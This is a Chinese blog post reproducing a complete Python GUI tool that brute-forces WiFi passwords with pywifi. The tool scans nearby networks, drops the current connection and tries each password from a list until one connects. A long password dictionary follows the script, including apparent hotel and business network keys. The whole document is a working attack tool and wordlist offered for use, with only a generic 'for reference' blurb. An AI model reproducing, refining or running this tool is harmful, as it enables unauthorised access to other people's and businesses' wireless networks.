wifi 暴力破解 (python)

这篇具有很好参考价值的文章主要介绍了wifi 暴力破解 (python)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

python脚本

github:https://github.com/baihengaead/wifi-crack-tool文章来源地址https://www.toymoban.com/news/detail-702561.html

python

# -*- coding: utf-8 -*-
from cgitb import text
from concurrent.futures import thread
from ctypes.wintypes import SC_HANDLE
from math import fabs
from struct import pack
import sys
import io
from venv import create
from numpy import insert
sys.stdout=io.TextIOWrapper(sys.stdout.buffer,encoding='utf8')

import pywifi
import time
from pywifi import const

import os
import threading
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import CENTER, LEFT, messagebox as msg  #消息框
from tkinter import filedialog as openfile  #打开文件夹
import ctypes
# from wifiCrackIcon import img   # 图标
# import base64,os

# 隐藏控制台窗口
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    ctypes.windll.user32.ShowWindow(whnd, 0)
    ctypes.windll.kernel32.CloseHandle(whnd)

# 告诉操作系统使用程序自身的dpi适配
ctypes.windll.shcore.SetProcessDpiAwareness(1)
# 获取屏幕的缩放因子
ScaleFactor=ctypes.windll.shcore.GetScaleFactorForDevice(0)


# 初始化窗口
win = tk.Tk()
win.title('Wifi密码暴力破解工具 @白恒aead')
win.lift()

# 设置窗口大小并且居中显示
# 屏幕宽度以及屏幕高度
screenwidth = win.winfo_screenwidth()
screenheight = win.winfo_screenheight()
dialog_width = 600
dialog_height = 600
# 前两个参数是窗口的大小,后面两个参数是窗口的位置
win.geometry("%dx%d+%d+%d" % (dialog_width, dialog_height, (screenwidth-dialog_width)/2, (screenheight-dialog_height)/2))

# 禁止调整窗口大小
win.resizable(False,False)

# # 设置打包图标
# tmp = open("tmp.ico","wb+")  
# tmp.write(base64.b64decode(img))#写入到临时文件中
# tmp.close()
# win.iconbitmap("tmp.ico") #设置图标
# os.remove("tmp.ico")      #删除临死图标

# 用来包裹frame的容器
frame = tk.Frame()
frame.pack(padx=1,pady=(10,0))
frame_type = tk.Frame()
frame_type.pack(padx=1,pady=(10,0))
frame_file = tk.Frame()
frame_file.pack(padx=1,pady=(5,0))
frame_btn = tk.Frame()
frame_btn.pack(padx=1,pady=(5,0))

# 提示输入wifi名称的标签
lbl_wifiName = ttk.Label(frame,text="Wifi名称:")
lbl_wifiName.pack(side=tk.LEFT)

# wifi名称选中框
sel_wifiName = ttk.Combobox(frame,width=23)
sel_wifiName.pack()
sel_wifiName['state'] = 'disabled'

# 提示输入加密类型的标签
lbl_wifiType = ttk.Label(frame_type,text="安全类型:")
lbl_wifiType.pack(side=tk.LEFT)

# 加密类型选中框
sel_wifiType = ttk.Combobox(frame_type,width=23)
sel_wifiType.pack()
sel_wifiType['value'] = ['WPA','WPAPSK','WPA2','WPA2PSK','UNKNOWN']
sel_wifiType.current(3)

file_path = 'passwords.txt'
filepaths = file_path.split('/')
filename = filepaths[len(filepaths)-1]
# 显示正在使用的密码本
lbl_pwdstitle = ttk.Label(frame_file,text='正在使用密码本:')
lbl_pwdstitle.pack(side=tk.LEFT)
lbl_pwds = ttk.Label(frame_file,text=filename)
lbl_pwds.pack()

# 选择密码本
def change():
    '''选择密码本'''

    try:
        default_dir = r"."
        global file_path
        global filepaths
        global filename
        temp_file_path = openfile.askopenfilename(title=u'选择密码本', initialdir=(os.path.expanduser(default_dir)))
        temp_filepaths = temp_file_path.split('/')
        temp_filename = temp_filepaths[len(temp_filepaths)-1]
        temp_filenames = temp_filename.split('.')
        temp_filetype = temp_filenames[len(temp_filenames)-1]
        if(temp_filetype==''):
            msg.showinfo(title='提示',message='未选择密码本')
            return False
        elif(temp_filetype!='txt'):
            msg.showerror(title='选择密码本',message='密码本类型错误!\n目前仅支持格式为[txt]的密码本\n您选择的密码本格式为['+temp_filetype+']')
            return False
        else:
            file_path = temp_file_path
            filepaths = temp_filepaths
            filename = temp_filename
            lbl_pwds['text'] = filename
            return True
    except Exception as r:
        msg.showerror(title='错误警告',message='选择密码本时发生未知错误 %s' %(r))

# 创建选择密码本路径的按钮
btn_file = ttk.Button(frame_btn,text='更换密码本',width=10,command=change)
btn_file.pack(side=tk.LEFT)

# 创建滚动条
msg_scroll = ttk.Scrollbar()
# 创建文本框用于展示提示信息
msg_info = tk.Text(win, width=65)
# 将滚动条和文本框绑定在一起
msg_scroll.config(command=msg_info.yview)
msg_info.config(yscrollcommand=msg_scroll.set)

#设置程序缩放
win.tk.call('tk', 'scaling', ScaleFactor/75)

# 用于输出消息
def msgshow(msg):
    '''输出显示消息'''

    msg_info['state'] = 'normal'
    msg_info.insert(tk.END,msg)
    msg_info.see(tk.END)
    msg_info['state'] = 'disabled'

# 用于清空消息
def msgempty():
    '''清空输出消息'''

    msg_info['state'] = 'normal'
    msg_info.delete(1.0,tk.END)
    msg_info['state'] = 'disabled'

# 重置所有按钮状态
def btnreset():
    '''重置按钮'''
    
    sel_wifiName['state'] = 'normal'
    sel_wifiType['state'] = 'normal'
    btn_Reflush['state'] = 'normal'
    btn_file['state'] = 'normal'
    btn_run['state'] = 'normal'
    btn_stop['state'] = 'disabled'

# 判断字符串是否包含中文
def is_contains_chinese(strs):
    for _char in strs:
        if '\u4e00' <= _char <= '\u9fa5':
            return True
    return False

run = True
# 暴力破解wifi密码的类
class Crack():
    '''用于暴力破解wifi的类'''

    def initCrack(self):
        """初始化暴力破解"""

        try:
            msgempty()
            wifi = pywifi.PyWiFi()  # 抓取网卡接口
            self.iface = wifi.interfaces()[0]# 获取网卡
            thread = threading.Thread(target=self.Search_WiFi,args=())# 获取附近wifi名称
            thread.setDaemon(True)
            thread.start()
        except Exception as r:
            msg.showerror(title='错误警告',message='初始化时发生未知错误 %s' %(r))
            msgshow('初始化时发生未知错误 %s\n\n' %(r))
            btnreset()

    def Search_WiFi(self):
        """扫描附近wifi => wifi名称数组"""
        
        try:
            sel_wifiName['value'] = []
            btn_Reflush['state'] = 'disabled'
            name = self.iface.name()#网卡名称
            self.iface.scan()#扫描AP
            msgshow('正在使用网卡['+name+']扫描WiFi...\n')
            time.sleep(1)
            bessis = self.iface.scan_results()#扫描结果列表
            msgshow('已扫描到WiFi\n\n')
            ssids = []
            i = 0
            for data in bessis:#输出扫描到的WiFi名称
                # ssids.insert(i,data.ssid.encode('raw_unicode_escape').decode('utf-8'))
                ssids.insert(i,data.ssid)
                i+=1
                
            btn_Reflush['state'] = 'normal'
            btn_run['state'] = 'normal'
            sel_wifiName['state'] = 'normal'
            sel_wifiName['value'] = ssids
            sel_wifiName.current(0)
        except Exception as r:
            msg.showerror(title='错误警告',message='扫描wifi时发生未知错误 %s' %(r))
            msgshow('扫描wifi时发生未知错误 %s\n\n' %(r))
            btnreset()

    def Connect(self,name):
        '''开始破解wifi'''

        try:
            global run
            global file_path
            x = 1
            self.iface.disconnect()  # 断开所有连接
            msgshow('正在断开现有连接...\n')
            time.sleep(1)
            if self.iface.status() in [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]:  # 测试是否已经断开网卡连接
                msgshow('现有连接断开成功!\n')
            else:
                msgshow('现有连接断开失败!\n')
                return
            msgshow('\n正在准备破解WiFi[%s]...\n\n'%(name))
            with open(file_path,'r', encoding='gb18030', errors='ignore') as lines:
                for line in lines:
                    if run==False:
                        msgshow('破解已终止.\n')
                        return
                    pwd = line.strip()
                    # 判断安全加密类型
                    akm = sel_wifiType.get()
                    akm_v = 4
                    if akm=='WPA':
                        akm_v = 1
                    elif akm=='WPAPSK':
                        akm_v = 2
                    elif akm=='WPA2':
                        akm_v = 3
                    elif akm=='WPA2PSK':
                        akm_v = 4
                    elif akm=='UNKNOWN':
                        akm_v = 5
                    profile = pywifi.Profile()  #创建wifi配置对象
                    # 判断wifi名称是否包含中文字符
                    if is_contains_chinese(name):
                        profile.ssid = name.encode('utf-8').decode('gbk')   # 对wifi名称进行utf-8解码
                    else:
                        profile.ssid = name.encode('raw_unicode_escape').decode('gbk')    # 对wifi名称进行unicode解码
                    profile.key = pwd   #WiFi密码
                    profile.auth = const.AUTH_ALG_OPEN  #网卡的开放
                    profile.akm.append(akm_v)  #wifi加密算法,一般是 WPA2PSK
                    profile.cipher = const.CIPHER_TYPE_CCMP #加密单元
                    self.iface.remove_network_profile(profile)  #删除wifi文件
                    tem_profile = self.iface.add_network_profile(profile)   #添加新的WiFi文件
                    msgshow('正在进行第%d次尝试...\n'%(x))
                    x += 1
                    self.iface.connect(tem_profile)#连接
                    time.sleep(1)   #连接需要时间
                    if self.iface.status() == const.IFACE_CONNECTED:    #判断是否连接成功
                        msgshow("连接成功,密码是%s\n\n"%(pwd))
                        msg_info['fg'] = 'green'
                        sel_wifiName['state'] = 'normal'
                        sel_wifiType['state'] = 'normal'
                        btn_Reflush['state'] = 'normal'
                        btn_file['state'] = 'normal'
                        btn_run['state'] = 'normal'
                        btn_stop['state'] = 'disabled'
                        msg.showinfo(title='破解成功',message="连接成功,密码是%s"%(pwd))
                        return
                    else:
                        msgshow("连接失败,密码是%s\n\n"%(pwd))
                        msg_info['fg'] = 'red'
                msg.showinfo(title='破解失败',message="破解失败,已尝试完密码本中所有可能的密码")
                sel_wifiName['state'] = 'normal'
                sel_wifiType['state'] = 'normal'
                btn_Reflush['state'] = 'normal'
                btn_file['state'] = 'normal'
                btn_run['state'] = 'normal'
                btn_stop['state'] = 'disabled'
        except Exception as r:
            msg.showerror(title='错误警告',message='破解过程中发生未知错误 %s' %(r))
            msgshow('破解过程中发生未知错误 %s\n\n' %(r))
            btnreset()

# 创建破解对象
crack = Crack()
thread = threading.Thread(target=crack.initCrack,args=())
thread.setDaemon(True)
thread.start()

# 刷新按钮
btn_Reflush = ttk.Button(frame_btn,text='刷新wifi',width=10)
# 开始按钮
btn_run = ttk.Button(frame_btn,text='开始',width=10)
# 停止按钮
btn_stop = ttk.Button(frame_btn,text='停止',width=10)

# 刷新wifi列表
def Reflush():
    try:
        global crack
        thread = threading.Thread(target=crack.Search_WiFi(),args=())
        thread.setDaemon(True)
        thread.start()
        msg_info['fg'] = 'black'
    except Exception as r:
        msg.showerror(title='错误警告',message='刷新wifi时发生未知错误 %s' %(r))
        msgshow('刷新wifi时发生未知错误 %s\n\n' %(r))
        btnreset()

# 开始暴力破解
def GetPwdRun():
    try:
        wifiName = sel_wifiName.get()
        global crack
        global run
        run = True
        sel_wifiName['state'] = 'disabled'
        sel_wifiType['state'] = 'disabled'
        btn_Reflush['state'] = 'disabled'
        btn_file['state'] = 'disabled'
        btn_run['state'] = 'disabled'
        btn_stop['state'] = 'normal'
        thread = threading.Thread(target=crack.Connect,args=(wifiName,))
        thread.setDaemon(True)
        thread.start()
        msg_info['fg'] = 'black'
    except Exception as r:
        msg.showerror(title='错误警告',message='运行时发生未知错误 %s' %(r))
        msgshow('运行时发生未知错误 %s\n\n' %(r))
        btnreset()

# 终止暴力破解
def Stop():
    try:
        global run
        run = False
        sel_wifiName['state'] = 'normal'
        sel_wifiType['state'] = 'normal'
        btn_Reflush['state'] = 'normal'
        btn_file['state'] = 'normal'
        btn_run['state'] = 'normal'
        btn_stop['state'] = 'disabled'
        msg_info['fg'] = 'black'
    except Exception as r:
        msg.showerror(title='错误警告',message='停止时发生未知错误 %s' %(r))
        msgshow('停止时发生未知错误 %s\n\n' %(r))
        btnreset()

btn_Reflush['command'] = Reflush
btn_Reflush['state'] = 'disabled'
btn_Reflush.pack(side=tk.LEFT)

btn_run['command'] = GetPwdRun
btn_run['state'] = 'disabled'
btn_run.pack(side=tk.LEFT)

btn_stop['command'] = Stop
btn_stop['state'] = 'disabled'
btn_stop.pack(side=tk.RIGHT)

# 设置消息框和滚动条的显示位置
msg_scroll.pack(side=tk.RIGHT,pady=10, fill=tk.Y)
msg_info.pack(side=tk.LEFT,pady=10, fill=tk.Y)

# 判断默认密码本是否存在
if not os.path.exists(file_path):
    msg.showwarning(title='警告',message='默认密码本[%s]不存在!\n请选择密码本'%(file_path))
    while(True):
        if(change()):
            crack = Crack()
            thread = threading.Thread(target=crack.initCrack,args=())
            thread.start()
            break

win.mainloop()

password

12345678        
123456789       
1234567890      
88888888        
87654321        
11111111        
00000000        
987654321       
11223344        
66668888        
0123456789      
147258369       
66666666        
123123123       
8888888888      
88889999        
12344321        
12341234        
11112222        
a1b2c3d4        
1111111111      
99999999        
1122334455      
mz4dz1s607      
12345679        
hantinghotels   
9876543210      
77777777        
999999999       
1234554321      
0987654321      
23456789        
a123456789      
22222222        
9Btspa          
abcd1234        
888888          
qwertyuiop      
445716          
123456          
55555555        
a12345678       
88886666        
0000000000      
12345           
0               
1234567899      
abc123456       
01234567        
123456789a      
a1234567        
asdfghjkl       
123456780       
wuqiaiwomm      
98765432        
111222333       
12345687        
1234512345      
888888888       
33333333        
00001111        
12345678910     
12121212        
taiji2365776    
66778899        
168168168       
111111111       
622000          
1357924680      
4008882888      
tyuioutfvh      
012345678       
123321123       
20132013        
GyFns7          
000000000       
12345678900     
789456123       
123456788       
1234567891      
12345677        
1233211234567   
520520520       
123456987       
123654789       
55558888        
77778888        
4008209999      
1234567890123   
200689          
112233445566    
12345670        
7daysinn        
aaaaaaaa        
110110110       
12356789        
jpl8t6          
123456123       
123321          
12345678a       
416206          
55556666        
00008888        
qwertyui        
18685450118     
11118888        
321321321       
qq123456        
abc12345        
Aa123456        
9999999999      
14725836        
299492          
1472583690      
123456789o      
meiyoumima      
7t5u9zan        
789567          
99998888        
12348765        
55667788        
jju2013wlan     
buzhidao        
6288            
369369369       
13145200        
12345600        
963852741       
1111122222      
369258147       
123789456       
12345689        
12312312        
1914            
123456654321    
a1b2c3d4e5      
peter19751218   
66669999        
12346789        
12345688        
997440384       
123             
11110000        
789789789       
33338888        
13572468        
qqqqqqqqqqqqqq  
01020304        
abcd123456      
1234abcd        
yh19930124      
01234567890     
106815          
123456123456    
741852963       
netcore12345678 
22223333        
68686868        
18181818        
6666688888      
abcde12345      
8888899999      
1008610086      
123456798       
00000001        
876543210       
88880000        
777888999       
1234567a        
135792468       
333666999       
13141314        
1224567890      
22334455        
abcdefgh        
123454321       
qqqqqqqq        
22228888        
gafl43sz        
44444444        
159159159       
123456789.      
123456abc       
13410253586     
6666666666      
mrihua911911    
asdfghjk        
20122012        
72c08049a5      
12131415        
44448888        
00112233        
12345612        
vern399300      
88888           
16888888        
abc123456789    
259695          
13800138000     
2008cf2008      
58585858        
88888889        
22446688        
77889900        
asd123456       
QAZWSXEDC       
12345671        
2222222222      
123456789000    
888888889       
52013140        
12345678901     
99887766        
lw810813        
qweqweqwe       
aaaaaaaaaa      
44332211        
HWSHRQ          
1234567800      
521521521       
15959502420     
1234567809      
123456789123    
qwer1234        
e3mvbLG2q       
147852369       
n3drv5s         
123123          
Jyckfyks1989    
123456aa        
1qaz2wsx        
cykss-zkzbs-4804                
Ab123456        
110120119       
wang93          
10101010        
jxut.edu.cn     
123456781       
ABC12345678     
5555555555      
bugaosuni       
1a2b3c4d        
258258258       
33336666        
96789           
10086111        
10203040        
275431          
11111112        
12345666        
!%40%23%24%2512345              
1212121212      
89898989        
123123123123    
100200300       
........        
666888999       
5555588888      
255eadccb7      
666666666       
11111111111     
321654987       
5201314520      
10000000        
A88888888       
1001010010      
12345678.       
abc1234567      
456456456       
4008802802      
AA12345678      
76543210        
123123456       
123456789abc    
xiaoqiang       
1223334444      
98989898        
lguplus100      
7777777777      
53215321        
11119999        
234567890       
12332100        
518518518       
44445555        
password        
00123456        
a9012747        
qwe123456       
1q2w3e4r        
66667777        
33445566        
46Z5T6          
19950812        
1234567888      
25802580        
abc13824210977  
31415926        
22221111        
181899          
12365478        
admin123        
zhang123        
1234qwer        
11111           
qweasdzxc       
2013063222      
54321           
155508          
20138888        
0000011111      
X%4082wer6      
jywjazzl        
34567890        
m7gcmmd5        
nqxff328        
zxcvbnm123      
16881688        
asdf1234        
5566778899      
12312300        
119119119       
78787878        
456789123       
aaaa1111        
a1234567890     
123456789987654321              
16816888        
12345abcde      
20080808        
19216811        
wobuzhidao      
01010101        
13456789        
12348888        
1k55649699J7    
W1234567        
56781234        
86868686        
12312345        
67896789        
qq123456789     
12345789        
0102030405      
123698745       
12369874        
20132014        
123456..        
ap123456        
aaa123456       
56785678        
3.1415926       
1231231231      
w123456789      
qq12345678      
4001001111      
w12345678       
00009999        
wuminwifi       
cmc12           
110119120       
33334444        
11113333        
44678888        
wwwwwwww        
1234567898      
666777888       
7894561230      
12345%40baidu   
987654123       
12345678962     
sellypaul555    
xe3trlle        
5555566666      
wang123456      
a123456a        
09876543        
66666688        
583413          
12332112        
11122233        
14725800        
3333333333      
li123456        
12345654321     
jiubugaosuni    
12354796        
zzzzzzzz        
1111111111111   
12345123        
5544332211      
88885555        
66886688        
15831562929     
1               
00000008        
1234567890abc   
qaz123456       
e76FO7          
366113          
huang1993       
65432100        
4007160888      
1234567890a     
zsj123          
pass623623      
123456qq        
81234567        
18888888        
9876543211      
123456789123456789              
12345678999     
147369258       
110120130       
13141516        
20130101        
88887777        
1231231234      
1234509876      
1A2B3C4D5E      
gongjianbu123   
12388888        
123456000       
abcd12345       
1213141516      
8573120654      
10002000        
kgna6e          
11335577        
q123456789      
08080808        
12301230        
12345678abc     
11223300        
20082008        
78945612        
11223355        
1234            
12345698        
bc123456        
77585210        
00000           
66688888        
00001234        
158158158       
13131313        
1231231230      
555555555       
1314520520      
xy123456        
77777778        
12340000        
88881111        
43214321        
aaaaBBBB        
20131314        
138138138       
56565656        
A8888888        
9988776655      
11221122        
20121212        
123123321       
yy123456        
123321123321    
q12345678       
987456321       
1010101010      
wang1234        
z123456789      
777777777       
147147147       
yangyang        
nicaicai        
aa123456789     
38383838        
123456ab        
2013037119      
bao521          
liu123456       
20131111        
20122013        
iloveyou        
222222222       
123456790       
rmyy191812345   
87651234        
123456ABCD      
534f4b4354      
sinachina       
12345678aa      
as123456        
14789632        
12345abc        
1234567.        
123321456       
zxc123456       
asd12345        
woaiwojia       
qwe12345        
3kbzewdb        
931840          
5845201314      
useradmin       
1472580369      
AAAA8888        
01230123        
1111100000      
5201314.        
abcd123456789   
000111222       
44556677        
1234567890.     
87654312        
52013141        
pps619com       
z12345678       
11111118        
123456321       
88998899        
sao13hmt        
toyoko-inn.com  
zteztezte       
123456789aa     
789123456       
999888777       
717816          
2627f68597      
12349876        
q1234567        
ddfguygghhj     
2233445566      
22345678        
a987654321      
poiuytrewq      
ff19830219      
20142014        
88888887        
28282828        
01234           
qwerasdf        
aabbccdd        
66895842        
0000000001      
19930906        
99990000        
1e40ed34c9      
1133557799      
1234567890000   
4007007899      
1234567         
100100100       
1236547890      
23232323        
z1234567        
Ab12345678      
zhang123456     
nishengri       
159357258       
80808080        
www123456       
sibs1234        
mmmmmmmm        
123456777       
11116666        
woaini1314      
000000001       
wocaonima       
520131400       
147896325       
987654321a      
D9DD5Q          
494888          
456123789       
201314520       
371276          
258369147       
qw123456        
88888881        
11111110        
123567890       
q1w2e3r4        
1q2w3e4r5t      
20131001        
dd8804          
yang123456      
P%40ssw0rd      
abcdabcd        
1123456789      
56215487        
120120120       
95279527        
4000034567      
qwert12345      
XXXXXXXX        
90909090        
11114444        
123456789q      
23558573        
112233445566778899              
99996666        
987654321.      
51888888        
Webex6666       
24682468        
aaaaaaaaa       
333333333       
123456789..     
77585211        
hy123456        
12345888        
lx19940220      
12342234        
88888886        
12300000        
20121221        
wyyy20121001    
8888866666      
jy123456        
xpyp2012        
13579246810     
a12345678a      
12345677654321  
cptbtptp        
52001314        
12345678911     
88888888a       
1234567895      
22226666        
21212121        
deppon%2540123  
0011223344      
123456888       
pj123456        
abc123123       
121121121       
88888880        
80238023        
13579246        
00002222        
dg123456        
deppon%40123    
1020304050      
77582588        
0147258369      
10086110        
chen123456      
123654987       
abcd8888        
abc123abc       
12345611        
6000000         
f3rmce          
11223388        
huang123        
********        
98765432100     
11234567        
a1d749d20c      
43211234        
88882222        
66666668        
111111          
55555           
888888888888    
motel168        
studentwifi     
yyyyyyyy        
zic790823       
zz123456        
adminadmin      
666666888888    
88888888888     
13579000        
123456456       
66666           
424384          
9999988888      
14259125        
haidilao        
36971288        
tytw54          
9638527410      
ZengWenhan0530  
Baidu(wireless)user*key%2610    
abcde           
YD123123%40     
112233445577    
12345699        
12378900        
5432154321      
qwertyuiop123   
09090909        
zx123456        
88883333        
bohui888        
zxcvbnma        
aabbccddee      
888888880       
ly123456        
abc88888        
abcdef1234      
77779999        
1380013800      
4006998998      
asd123456789    
l12345678       
5205201314      
19191919        
zy123456        
189189189       
ZLT14dsi        
18319998093     
12312388        
08520852        
gao316          
13145201        
eeeeeeee        
13145210        
qazwsx123       
123456789qq     
wj123456        
12347890        
74108520        
aa123123        
111666888       
7777788888      
admin123456     
qwertyuio       
lzdxdyyy        
66665555        
12345000        
BBBBBBBB        
alongeres173108 
52013148        
85011429        
88888866        
aaa12345        
xiaoxiao        
wohaishinidie   
oooooooo        
45678910        
Cisco123        
11011011        
chen1234        
lkjhgfdsa       
a1d747d348      
ws123456        
llllllll        
20131415        
111             
aa888888        
52013141314     
1258012580      
81818181        
112233445       
myj4008871133   
15935700        
28883888        
1233211234      
a123456789a     
1029384756      
66888888        
B47S7D          
987987987       
xet2%3BmBk      
1234506789      
caonimabi       
112345678       
22225555        
082788888888    
mm123456        
abcd4321        
bakaishuangtui%253F%253F%253F%253F              
01233210        
10086123        
ww123456        
2345678901      
ab123456cd      
12332111        
123456789012    
1122334455667788                
1357913579      
88776655        
11115555        
77582580        
55668899        
cccccccc        
1000010000      
chai170356.     
007007007       
33339999        
20130808        
141121          
1314520.        
22224444        
aaa             
1234567812      
jcismydt        
11121314        
139139139       
19881988        
199508181014%2540hh             
Baidu(wireless)user*key%252610  
1234561234      
yang1234        
86983659        
199771          
1111188888      
abc1234567890   
12345678000     
chuangwei668    
123412345       
85208520        
ChinaTelecom3Ggood              
98765431        
jx123456        
l123456789      
pppppppp        
mpmk222013      
xx123456        
ffffffffff      
aaaaabbbbb      
69696969        
qq123123        
111222333444    
hao123456       
abcd12345678    
ssssssss        
1234567891011   
tdpwthkv        
52013144        
741741741       
20202020        
555666777       
96385274        
a87654321       
a1a2a3a4        
88888899        
333222111       
88884444        
33335555        
912345678       
a1d747e062      
141242343       
678678678       
admin           
hhhhhhhh        
000000          
118118118       
66663333        
2c8b13c357aa    
A5201314        
yanggektv       
123456asd       
123456aaa       
00006666        
kkkkkkkk        
33221100        
888888881       
98765321        
rmyy1918        
001002003       
87654320        
19871987        
00123456789     
7708801314520   
188888888       
19491001        
4008899511      
68888888        
wu123456        
10086000        
33332222        
ls123456        
58888888        
131452000       
a147258369      
12345678q       
123456799       
85858585        
19860305        
12345555        
123456789z      
aaaa1234        
87878787        
44446666        
zxcv1234        
aini1314        
33669900        
52013145        
aa112233        
7xiongV5        
QCdUT3Ba        
yuanyuan        
13579           
193124          
liuhaiwei       
123qweasd       
t5tAMw          
88668866        
qaz12345        
111111111111    
12345678ab      
12345qwert      
a123456b        
c43e15c387      
301301301       
1688888888      
16161616        
4008838853      
80908090        
0012345678      
750197          
8888888888888   
18283848        
dtjgswglj       
0000            
20131313        
110112119       
584520          
123456789w      
cugb2294        
wuxian168       
500599          
25252525        
77887788        
10Y%2540QQcom   
abc888888       
159357123       
h12345678       
99999           
12345678987654321               
4008208820chenjunsheng          
IPAD_PUD        
123456654       
19891989        
123456890       
20131010        
00000000000     
250250250       
mgzxx           
11117777        
Y12345678       
11223366        
123456789aaa    
987654320       
123456wifi      
20130901        
12345678912     
eminence2013    
13148888        
2008Jiayou%3F   
Kvtr1S          
tiantian        
woaini520       
h123456789      
01234560        
911911911       
19861986        
19901990        
20121126        
20112011        
88123456        
12345678qq      
098765432       
abcdeabcde      
1818181818      
x12345678       
x1234567        
huawei800       
A1111111        
23456781        
zh123456        
1234567892      
789654123       
www12345        
y123456789      
1234560000      
hh123456        
88881234        
315315315       
5432112345      
abc123321       
201201201       
44370275        
25257758        
cc123456        
97654321        
55665566        
sm565656        
12456789        
12345678901234567890            
12cmcc          
zj123456        
99999998        
TSYw78367%23    
bangongshi      
a123123123      
1008610010      
99991111        
houcaller88     
255eadb095      
love1314        
4008527527      
111122223333    
12346678        
qq888888        
55559999        
1234567891234   
25836900        
800best.com     
aaa123456789    
000123456       
4001840018      
36363636        
fsyy123456      
06680668        
360360360       
401401401       
000000000000    
123456789abcd   
903311          
147258369a      
21345678        
yu123456        
151475          
00005555        
07690769        
8008208820      
5201314..       
51885188        
128128128       
abcabcabc       
64355111        
24681357        
1111111110      
0101010101      
33355555        
lkmWKG19890820  
135135135       
159357456       
502502502       
00000011        
hotwind1996     
1qazxsw2        
87654322        
gongxifacai     
20130501        
55555333        
10001000        
juranzhijia     
11223311        
11223345        
20130104        
1234567887654321                
112112112       
1234569870      
20051115        
302302302       
87654321a       
xiaojidunmogu   
1111199999      
liu12345        
asdf123456      
24681012        
qwert123        
1234567889      
qwer123456      
scucc           
12345678w       
123456qwe       
haidilaoxxb     
52052052        
lx123456        
l1234567        
23452345        
zlgslnmylby     
dongdong        
abcdefg123      
c123456789      
10000001        
1234567812345678                
Tt111111        
66688899        
10987654321     
1995818abc      
cmcc12345       
0000088888      
74185296        
liutiegang      
52088888        
09876543210     
FFFFFFFF        
%40mjjgwgmj     
4006665678      
welcome123      
601601601       
aaabbbccc       
5201314123      
5201314         
y1234567        
li12345678      
513714          
hy25118888      
hu123456        
xu123456        
205205205       
12345678123     
11111122        
abc654321       
15151515        
123456787       
12345678qw      
x123456789      
12340987        
lin123456       
52005200        
111111112       
52525252        
00000009        
20121314        
59505950        
501501501       
harry630        
100000000       
87654123        
jingjing        
203203203       
987456123       
45678900        
aaaaa11111      
20128888        
12181           
changchunshifan 
tt123456        
123459876       
sy123456        
asdasdasd       
hahahaha        
chenchen        
12345678909     
321987          
398880          
b123456789      
..samsung511%252B%252B          
QWERT           
Math691129003   
308308308       
19283746        
00000007        
20130000        
25321308        
125125125       
268588          
20130601        
257524          
km123           
12332188        
13888888        
1qaz2wsx3edc    
1105201314      
222333444       
bjtelecom       
123412341234    
wy123456        
1234567abc      
987123456       
zxcvbnm1        
kk123456        
888999000       
444555666       
1234567q        
guest123        
963258741       
20140101        
tujia.com       
7rfRFU          
88888800        
12312311        
222555888       
hkjcwifi        
wyyylnternet    
36925814        
19880808        
1111            
123456qaz       
jdedu.net       
14725836900     
5201314a        
1116903785      
19890608Swk     
ss123456        
c12345678       
zc123456        
20130801        
qwertyuiopasdfghjklzxcvbnm      
192.168.1.1     
hello           
100861111       
s19920305s      
6677889900      
14141414        
523606          
zhou123456      
12345678..      
w88888888       
360buy123456    
ll123456        
wangwang        
abcabc123       
1112223334      
zxcvbnml        
1111155555      
512512512       
asdfghjkl123    
8888888899      
02345678        
123789123       
apple123        
22558800        
66889900        
hzzx12345       
52052000        
123456789b      
123456...       
portsw0701      
ab123456789     
202202202       
6789012345      
caonimei        
YOOBAO123       
838099560       
liang123        
Lj123456        
s12345678       
39392788hlhl    
hanjunjie123    
jiang123        
20120101        
a1b2c3d4e5f6    
yb123456        
wwwshitacnet    
00011185        
36263394643207  
n0n8u8soax      
1231512315      
gggggggg        
15975300        
4008203333      
qq1234567       
6666699999      
yh123456        
123456789x      
wei123456       
010203040506    
12580000        
4444444444      
m123456789      
cy123456        
17171717        
zhangwei        
1314520..       
55201314        
201320132013    
qwe123456789    
qw372198        
1000000000      
917373          
QAZWSXED        
UPC1953to2013   
caonima123      
uc%23mobile     
5858585858      
ruijie123       
876543211       
4006770066      
02020202        
33337777        
123456789*      
303303303       
963963963       
zl123456        
05960596        
22220000        
baolong1234     
longlong        
h1234567        
tttttttt        
13145208        
admin888        
2468013579      
2345678910      
cdcwl           
188188188       
zxcvbnmm        
136136136       
9999999990      
ad123456        
wvtest          
12345690        
32132132        
43215678        
1237894560      
55557777        
333666888       
54726           
bysq5678        
12345678z       
SH123456        
80008000        
8888800000      
qq5201314       
82320888        
123456789987    
Qsf8ptSd        
22336688        
06070809        
307307307       
a11111111       
Pa888888        
26262626        
hj123456        
33668899        
1234598765      
207207207       
998998998       
213213213       
4008305555      
4Seasons%402013 
s123456789      
YANGGUANG       
a2345678        
12378945        
1023456789      
402402402       
55550000        
1357902468      
hx123456        
99889988        
administrator   
ma123456        
b1234567        
qqqqqqqqqq      
4008123456      
20131212        
520131488       
00012345        
wumeichaoshi    
123456789...    
20092009        
11001100        
tingting        
204204204       
2000000         
20131400        
13345678        
0.123456        
M1234567        
111333555       
wang123456789   
wl627330        
158762g38       
666688888       
553929          
20111111        
305305305       
woaini123       
li123456789     
103103103       
32323232        
abc88888888     
312312312       
234567891       
123456789.0     
asd12345678     
88888168        
kingsoft7777    
19911991        
3132333435      
19941994        
012345679       
13160201        
12365400        
147258963       
bysq1234        
buxiaode        
45678912        
32145678        
211211211       
1234567w        
2222233333      
8888baolong     
101101101       
19951995        
zhanglei        
123abc123       
369852147       
12345678990     
88888666        
78907890        
nihao123        
m12345678       
xinwen1986      
tp123456        
yj123456        
ee88282116      
19881010        
10102020        
..........      
asdfasdf        
hl123456        
8888888800      
16816800        
012345678910    
13143344        
adgjmptw        
vvvvvvv         
13603095163     
333444555       
!%2540%2523%2524%252512345      
987654312       
yx123456        
310310310       
ld123456        
52000000        
apec2014        
88888888.       
00998877        
a1s2d3f4        
206206206       
108108108       
12345676        
abcd2013        
19851985        
12345656        
fzz123          
412412412       
5678956789      
baolong123      
cptbtptpbcptdtptp               
11235813        
abcde123        
1234556789      
xingxing        
19891010        
sqnh199494      
ZXC12345        
wz123456        
6574851         
98765           
528528528       
abc112233       
11881188        
33669988        
318318318       
52113140        
bQxGzcvg7443F   
668668668       
85308888        
zhangjie        
20121001        
yc123456        
